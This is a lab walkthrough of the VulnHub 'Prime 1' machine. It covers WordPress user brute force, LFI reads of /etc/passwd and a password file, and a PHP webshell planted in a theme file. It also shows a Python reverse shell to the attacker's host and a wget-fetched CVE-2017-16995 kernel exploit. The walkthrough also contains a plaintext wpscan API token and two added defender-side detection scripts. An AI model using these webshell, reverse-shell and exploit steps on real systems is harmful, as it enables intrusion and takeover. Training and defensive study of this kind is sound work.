泷羽Sec-尘宇安全
Preface
OSCP prep, OSCP series: the Prime_Series_Level-1 machine, covering wpscan brute force, an LFI vulnerability, getting a shell by editing WordPress files, and Ubuntu kernel privilege escalation
Difficulty: easy, leaning towards medium
- Getting the low-privilege shell involves: wpscan brute force, an LFI vulnerability, and editing a WordPress file to get a shell
- Privilege escalation: Ubuntu kernel exploit
Download link:
https://www.vulnhub.com/entry/prime-1,358/
nmap
Host discovery
└─# nmap -sn 10.10.10.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:20 CST
Nmap scan report for 10.10.10.1
Host is up (0.00092s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00069s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 10.10.10.152
Host is up (0.00044s latency).
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E3:2F:42 (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap scan report for 10.10.10.151
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 3.52 seconds
Port scan
└─# nmap --min-rate 10000 -p- 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:21 CST
Nmap scan report for 10.10.10.152
Host is up (0.00097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 27.63 seconds
└─# nmap --min-rate 10000 -p- 10.10.10.152 -sU
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 16:24 CST
Warning: 10.10.10.152 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.152
Host is up (0.00086s latency).
All 65535 scanned ports on 10.10.10.152 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:E3:08:DA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds
Detailed port scan
└─# nmap -sV -sT -sC -O -p22,80 10.10.10.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-19 17:13 CST
Nmap scan report for 10.10.10.152
Host is up (0.00087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:E3:08:DA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
Information gathering
Web page on port 80
It turns out to be WordPress 5.2.2
Directory scan
dirb http://10.10.10.152/ -X .txt,.php,.zip
http://10.10.10.152/dev
Nothing useful there
http://10.10.10.152/secret.txt
It mentions a location.txt file and a link; let's visit the link
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
It uses wfuzz, so the hint is that we need to brute-force a parameter
Exploitation
wpscan
wpscan --url http://10.10.10.152/wordpress/ -e u --api-token jVg0FHFXO21oRJ3Tv9sxqYepnXAeql6qooSQfObKysQ
Got one username: victor
Brute-force the password
wpscan --url http://10.10.10.152/wordpress/ -U victor -P /usr/share/wordlists/rockyou.txt -t 30 --api-token jVg0FHFXO21oRJ3Tv9sxqYepnXAeql6qooSQfObKysQ
Brute-force output
Parameter fuzzing, LFI vulnerability
From the information gathering we know a parameter needs to be brute-forced; we use ffuf
Fuzzing
ffuf -u http://10.10.10.152/index.php?FUZZ=./secret.txt -w /usr/share/dirb/wordlists/common.txt -fs 0 >fuzz.txt
Filter the output with grep, dropping the lines containing 136:
cat fuzz.txt | grep -v "136"
This reveals a file parameter; visit it
http://10.10.10.152/index.php?file=./secret.txt
It says we are digging in the wrong file, so try the file mentioned earlier
http://10.10.10.152/index.php?file=location.txt
It says to use the 'secrettier360' parameter on some other php page, and the only other one is image.php
http://10.10.10.152/image.php?secrettier360=./index.php
It says we got the right parameter; now read /etc/passwd
http://10.10.10.152/image.php?secrettier360=../../../../../../../../etc/passwd
find password.txt file in my directory
Based on this, the user is saket and the path is /home/saket/password.txt; read it
http://10.10.10.152/image.php?secrettier360=../../../../../../../../home/saket/password.txt
This gives:
follow_the_ippsec
Combined with the username victor obtained earlier, try logging in
Getting a shell by editing WordPress page files
Login succeeded; uploading a reverse shell script did not work
Searching online for WordPress 5.2.2 vulnerabilities leads to the theme file editor; find a writable file there and write a webshell into it
<?php
system($_GET["cmd"]);
?>
The access path of the edited file follows this pattern:
- First, it is under the /wordpress/wp-content/themes/ directory
- Then the theme is Twenty Nineteen, so the next directory level is /twentynineteen
- So the final path is http://10.10.10.152/wordpress/wp-content/themes/twentynineteen/secret.php?cmd=ls
Visit it
Reverse shell
http://10.10.10.152/wordpress/wp-content/themes/twentynineteen/secret.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.10.128%22,6666));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27
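As an added example (not part of the original walkthrough), the following Python script shows how the ffuf parameter brute force, the LFI reads through secrettier360, and the requests to the dropped secret.php above would look to a defender reading the Apache access log. The log lines are constructed to mirror this page's requests; the fuzzing threshold and the list of shell-style parameter names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format; only the fields the checks need are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL = re.compile(r'\.\.[/\\]|^/(etc|proc)/')       # ../ chains or absolute system paths in a value
SHELL_PARAM = re.compile(r'^(cmd|exec|command)$', re.I)  # assumed list of query keys typical of a web shell
THEME_PHP = re.compile(r'/wp-content/themes/[^/]+/[^/]+\.php$')  # browsers rarely request theme PHP directly

def decode(value):
    """Two decoding passes so double-encoded traversal (%252e%252e/) is seen as well."""
    return unquote(unquote(value))

def analyse(lines, fuzz_threshold=20):
    """Return (ip, reason, target) findings for the given access-log lines."""
    findings = []
    param_names = defaultdict(set)  # (ip, path) -> distinct query parameter names seen
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m["ip"], m["target"]
        parts = urlsplit(target)
        path = decode(parts.path)
        for key, val in parse_qsl(parts.query, keep_blank_values=True):
            param_names[(ip, path)].add(key)
            if TRAVERSAL.search(decode(val)):
                findings.append((ip, "path traversal / LFI", target))
            if SHELL_PARAM.match(key):
                findings.append((ip, "command parameter", target))
        if THEME_PHP.search(path):
            findings.append((ip, "php request under theme dir", target))
    # Many distinct parameter names against one script from one client is what the ffuf run looks like server-side.
    for (ip, path), names in param_names.items():
        if len(names) >= fuzz_threshold:
            findings.append((ip, f"parameter fuzzing ({len(names)} names)", path))
    return findings

# Constructed sample lines mirroring this walkthrough's requests (not real server logs).
SAMPLE_LOG = [
    '10.10.10.128 - - [19/Feb/2025:17:20:00 +0800] "GET /image.php?secrettier360=../../../../../../../../etc/passwd HTTP/1.1" 200 2341 "-" "Mozilla/5.0"',
    '10.10.10.128 - - [19/Feb/2025:17:35:12 +0800] "GET /wordpress/wp-content/themes/twentynineteen/secret.php?cmd=ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.10.10.20 - - [19/Feb/2025:17:36:00 +0800] "GET /wordpress/?p=1 HTTP/1.1" 200 8120 "-" "Mozilla/5.0"',
] + [f'10.10.10.128 - - [19/Feb/2025:17:10:{i:02d} +0800] "GET /index.php?param{i}=./secret.txt HTTP/1.1" 200 136 "-" "Fuzz"'
     for i in range(25)]
```

Running `analyse(SAMPLE_LOG)` yields one traversal finding, two findings for secret.php, and one fuzzing finding for the 25 parameter names thrown at index.php, all attributed to 10.10.10.128.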
Privilege escalation
Read the config file to get the MySQL credentials
/** MySQL database username */
define( 'DB_USER', 'wordpress' );
/** MySQL database password */
define( 'DB_PASSWORD', 'yourpasswordhere' );
Looked around in the database but found nothing useful
sudo -l
Checking permissions shows one file that can be run without a password: /home/saket/enc
Tried a few things with it, but got nowhere
Ubuntu kernel privilege escalation, CVE-2017-16995
Check the kernel
www-data@ubuntu:/home/saket$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/home/saket$ cat /etc/*-release
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.3 LTS"
NAME="Ubuntu"
VERSION="16.04.3 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.3 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial
www-data@ubuntu:/home/saket$
Check whether there is a matching vulnerability; one looks like a good fit
Exploit it
wget http://10.10.10.128/cve-2017-16995.c
gcc cve-2017-16995.c -o cve-2017-16995
./cve-2017-16995
Root obtained successfully
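As an added defender-side check (not from the original post), this Python snippet parses the kernel release shown in the uname output above and reports whether unprivileged bpf(2), the interface CVE-2017-16995 is reached through, is still allowed by the kernel.unprivileged_bpf_disabled sysctl. The 4.14.9 upstream-fix threshold is an assumption taken from the CVE description; distribution kernels backport fixes, so treat it as a prompt to check the vendor advisory rather than as proof either way.

```python
import re
RELEASE_RE = re.compile(r'^(\d+)\.(\d+)\.(\d+)')
# Assumption: the upstream fix landed after 4.14.8 (the CVE description lists kernels
# "through 4.14.8" as affected). Distro kernels backport fixes without bumping this
# number, so "below threshold" means "check the vendor advisory", not "exploitable".
UPSTREAM_FIXED = (4, 14, 9)

def release_from_uname_a(uname_a):
    """'Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu ...' -> '4.10.0-28-generic'."""
    fields = uname_a.split()
    if len(fields) < 3:
        raise ValueError(f"not uname -a output: {uname_a!r}")
    return fields[2]

def parse_release(release):
    """'4.10.0-28-generic' -> (4, 10, 0); the distro suffix after the patch level is ignored."""
    m = RELEASE_RE.match(release)
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    return tuple(int(x) for x in m.groups())

def assess_bpf_exposure(release, unprivileged_bpf_disabled):
    """release: kernel release string; unprivileged_bpf_disabled: contents of
    /proc/sys/kernel/unprivileged_bpf_disabled ('0' = unprivileged bpf() allowed,
    '1' or '2' = denied). Returns both facts plus a recommended action."""
    version = parse_release(release)
    bpf_reachable = unprivileged_bpf_disabled.strip() == "0"
    predates_fix = version < UPSTREAM_FIXED
    if predates_fix and bpf_reachable:
        action = "set kernel.unprivileged_bpf_disabled=1 now, then patch the kernel"
    elif predates_fix:
        action = "unprivileged bpf() already blocked; still patch the kernel"
    else:
        action = "kernel is past the upstream fix; confirm via the distro advisory"
    return {"release": release, "version": version,
            "unprivileged_bpf_reachable": bpf_reachable,
            "predates_upstream_fix": predates_fix, "action": action}

def assess_running_host():
    """Read the live values on a Linux host (not used by the offline example below)."""
    import platform
    with open("/proc/sys/kernel/unprivileged_bpf_disabled") as f:
        return assess_bpf_exposure(platform.release(), f.read())

if __name__ == "__main__":
    # The uname line from this walkthrough; the sysctl value "0" is a constructed input.
    UNAME = ("Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 "
             "UTC 2017 x86_64 x86_64 x86_64 GNU/Linux")
    print(assess_bpf_exposure(release_from_uname_a(UNAME), "0"))
```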